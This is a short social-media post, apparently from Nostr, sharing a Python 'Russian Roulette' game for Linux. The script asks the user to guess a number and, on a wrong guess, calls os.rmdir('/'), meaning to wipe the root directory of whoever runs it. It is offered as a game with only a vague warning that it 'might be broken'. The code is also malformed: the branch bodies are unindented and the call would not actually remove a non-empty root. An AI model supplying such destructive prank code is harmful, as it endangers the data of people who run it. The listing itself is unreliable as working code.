Why Nostr? What is Njump?
2024-10-22 17:17:52

ItsHoward on Nostr: I have made a code for the Russian Roulette Game for Linux. Please be advised this ...

I have made a code for the Russian Roulette Game for Linux. Please be advised this program might be broken.

``` Python3
import random
import os

#RussianRouletteGame

number = random.randint(1,10)
guess = input("Guess a number betweeen 1 and 10")
guess = int(guess)

if guess == number:
print("You won!")
else:
os.rmdir("/")

```
Author Public Key
npub1twcyl6jnda83tvjsc4y9uu80unelwl3punx67ejnx2wk2sg870csvl5jxd